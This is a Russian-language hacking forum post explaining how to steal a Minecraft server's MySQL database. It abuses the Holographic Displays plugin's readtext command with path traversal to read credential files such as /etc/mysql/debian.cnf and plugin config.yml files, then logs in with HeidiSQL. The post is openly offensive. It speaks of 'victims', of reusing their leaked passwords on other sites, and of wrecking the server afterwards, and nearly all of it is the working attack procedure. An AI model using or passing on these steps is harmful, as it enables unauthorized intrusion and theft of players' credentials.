Приватный способ выкачать базу данных сервера MineCraft.

Тема в разделе "Веб уязвимости", создана пользователем Gooderzz, 14.03.18.Просмотров: 2.194

  1. Gooderzz UNTRU$TED

    Gooderzz

    38 сообщения
    27 симпатий
    0
    розыгрышей
    6 лет с нами
    15 дней с нами
    Так всё таки, как же угнать базу данных сервера в MineCraft?
    Заранее скажу, что вам понадобится только один софт, который гуляет в интернете, и вы сможете его скачать сами на свой страх и риск.

    Представим ситуацию, что вы получили полные права или же * на сервере.
    Перед тем, как вы его просто сломаете, вы можете вытащить из него данные, которые помогут вам в будущем.
    Например, по базе данных вы сможете найти ник своей жертвы, которая если регистрировалась на этом сервере, сможет дать вам пароль.
    Будет ли верен этот пароль или нет, это другой вопрос.
    Но если вы взломали крупный сервер, то уверяю вас, что ваша жертва не побоится там поставить свой настоящий пароль, который она использовала когда либо на другом сервере, где вы хотите её взломать.

    И так, преступим к самому интересному, всё таки, как же выкачать базу данных сервера?
    Для начала на сервере должен стоять плагин Holographic Displays.
    Подробная информация о нём есть тут -> Скрытый контент. Для просмотра Вы должны быть зарегистрированным участником


    Кратко скажу что это плагин, который добавляет голограммы на сервер. Он стоит на очень многих серверах.
    К нему в конфиге может стоять доступ и без полных прав, но, это уже как вам повезёт.

    Теперь посмотрим, как же всё таки можно с помощью него выкачать базу данных.
    1) Создаём голограмму.
    /hd create НазваниеГолограммы
    Пример:
    /hd create 123
    Создаётся летающий текст.
    2) Начинаем пробовать сканировать пути.
    пишем такую команду: /hd readtext НазваниеСвоейГолограммы Путь
    Все пути будут здесь:
    ../../../etc/mysql/debian.cnf
    ../../../../../../etc/mysql/debian.cnf
    /etc/mysql/debian.cnf
    Пример:
    /hd readtext 123 ../../../etc/mysql/debian.cnf

    Пробуйте все пути, если выдаёт ошибки во всех случаях, то используем другой способ. Если всё нашло, то перелестните статью до начала предложения ЧТО ЖЕ ДЕЛАТЬ, КОГДА ВСЁ НАШЛИ?

    Второй способ.
    1) Находим плагины сервера, их полный список.
    Способы как это сделать:
    /about TAB
    /version TAB
    /pl
    /plugins
    Это одни из основных. Нашли плагины? Едем дальше.

    2) Самый важный момент. На нашей уже созданной голограмме делаем вот такие действия:
    /hd readtext НазваниеВашейГолограммы ../НазваниеПлагина/config.yml
    Какое нужно вводить название плагина? Пробуйте перебирать АБСОЛЮТНО все плагины которые нашлись.
    Пример:
    /hd readtext 123 ../Mysql/config.yml

    ЧТО ЖЕ ДЕЛАТЬ, КОГДА ВСЁ НАШЛИ?
    В первую очередь, если вы использовали второй способ, то вы должны перебирать плагины до тех пор пока не найдёте голограмму с непонятным текстом, но с такими пометками:
    user
    port
    pass
    mysql

    Всё это было найдено? Записываем в блокнот все данные, которые написаны возле этих пометок.
    Пример:
    user - kolyu12
    port - 3306
    pass - dajk;l2

    Mysql тут не причём. Оно просто доказывает, что это база данных.

    Теперь качаем софтину под названием HeidSQL

    Когда скачали, запускаем и жмём кнопочку СОЗДАТЬ или же, если у вас английская версия то Create

    Далее открывается окошечко, где есть вот такие поля:

    Тип сети: (ИЛИ ЖЕ Network type)
    Имя хоста/IP: (ИЛИ ЖЕ Host name/IP)
    Пользователь: (ИЛИ ЖЕ User)
    Пароль: (ИЛИ ЖЕ Password)
    Порт: (ИЛИ ЖЕ Port)
    База Данных: (ИЛИ ЖЕ DataBase)
    Комментарий: (ИЛИ ЖЕ Comment)

    В имя хоста пишем АЙПИ СЕРВЕРА на котором вы нашли бд.
    В пользователя пишем то, что было написано в голограмме на пометке USER
    В пароль пишем то, что было написано в голограмме на пометке PASS
    В порт всегда пишем 3306
    В базу данных пишем db1 или же db
    Комментарий не трогаем.
    Ах да, тип сети оставляем MySql (TCP/IP)

    Пример:
    Тип сети: MySQL (TCP/IP)
    Имя хоста/IP: 123.123.123.123
    Пользователь: kolyu12
    Пароль: dajk;l2
    Порт: 3306
    База Данных: db1
    Комментарий:


    Наконец нажимаем кнопочку ОТКРЫТЬ или OPEN, и если у вас всё сработало, то поздравляем, вы вошли в базу данных.
    Good luck.